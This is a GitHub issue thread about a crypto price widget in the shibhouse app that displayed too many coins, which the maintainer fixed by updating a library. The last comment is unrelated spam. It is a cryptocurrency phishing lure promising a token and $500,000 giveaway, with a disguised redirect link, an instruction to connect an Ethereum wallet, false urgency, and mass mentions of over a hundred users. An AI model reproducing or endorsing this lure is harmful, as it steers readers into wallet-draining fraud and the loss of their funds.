### ISSUE TITLE
Crypto prices view in home screen

### ISSUE THREAD

**Issue by jihedkdiss** [azizbecha/shibhouse#6]
It seems like it's displaying many coins to the point it becomes unreadable. Think about setting a limit or something @azizbecha 
![image](https://user-images.githubusercontent.com/57290059/196001356-7a55d217-5738-45aa-a6f4-3d085f33b5cf.png)

**Comment by jihedkdiss** [comment]
It seems it's back working again here's another ss 
![image](https://user-images.githubusercontent.com/57290059/196001861-12684bf3-601c-487d-ae02-ebc4f7bdfb6e.png)
won't clost this issue unless you do and you're sure it's not a bug

**Comment by azizbecha** [comment]
This issue is caused by the old version of the library "[react-ts-tradingview-widgets(https://www.npmjs.com/package/react-ts-tradingview-widgets)" so I updated to the last version and the bug went away. Thanks for your interest.

**Comment by phieule2024** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
badiedmami, @joc-rgb, @JuanAContreras, @lainahewett, @michaelsfeature, @MoCr8, @pa-bru, @1mingfei, @luuquocviet79, @wilsonwid, @MakerScott, @xyz-fly, @Magkoohp, @leonngen, @g761007, @geniux-TI, @arthur-melo, @lidd77, @Tilican, @wwwwweieieieiei, @leyzerok, @0xoverbet, @giovannicanedoli, @Riki1200, @westerandr, @RahulRajelli, @axel-muller, @KyonCN, @Ameralameri, @moshahin01, @lumen-limitless, @klutchdev, @JackTDH, @Delegat43, @w614618075, @01JAMIL, @0Ksecurity, @andyrobert3, @zeydtc, @pu2wof, @GH-JY, @CBI1Alpha, @pinky-codes, @aspearman, @pichlerx, @Jackylee1992, @ryan4yin, @monsieurr, @someshdash, @DigitalPhilosopherwedpfeuu, @Therushmorare, @onahhhhh, @constanedes, @cloakedj, @lennasuzaka1988, @heysj, @Drinkler, @ellisdick, @gabbieatangan40, @consatan, @tmsko, @0zAND1z, @ivanzotov, @hiejulia, @preetsethi, @GHkrishna, @0x3c, @p-force, @EthanOK, @lyciumlee, @stefanhenseler, @mghelima, @hyperhtml, @QiuKN, @mazzawi93, @damorela, @samkit993, @MaxMood96, @jmboby, @manoranjan001p, @jordanliu, @foxgg9, @thomaspockrandt, @FreeSoulsDotBat, @toby-p, @kelm-dsp, @bhp1127, @uji, @FreezingM, @justanothertechguy, @imammashur, @mikrowil, @Lil-Late-06xX, @neefrankie, @anyDroidzOS, @Ziad251, @NsikakJohn, @hilquiasrf, @los46733genesisxyz, @inmortalbobz, @evanxuw, @andrey-fly, @u063mxj, @iocron, @Lpfigueiredo, @KeithLin724, @outer199, @ilzenzo, @appleseed-iii, @edilsonborges, @relu91, @vashafaris, @ChrisCho-H, @ghostffcode, @hjairo, @cacosta88, @devincapriola, @gjaldon, @Atish1010, @liutaohz, @albwrit, @EilianLiu, @imminist, @minseolee, @jancuk, @fabiodr, @sohamxz, @xxrufus, @jmowen, @sir4ju1, @simply-joe, @ZJ97090801, @sourabhmarathe, @NICKSAUNDERS, @Killer2432323, @bassdude5, @fthrslntgy, @hnq90, @wanderingbird, @0xn0v, @alisheikhhi, @formin, @samuelnonyelu, @Question406, @ruvaag, @svyatoslavratov, @prollinson, @twistedyogi
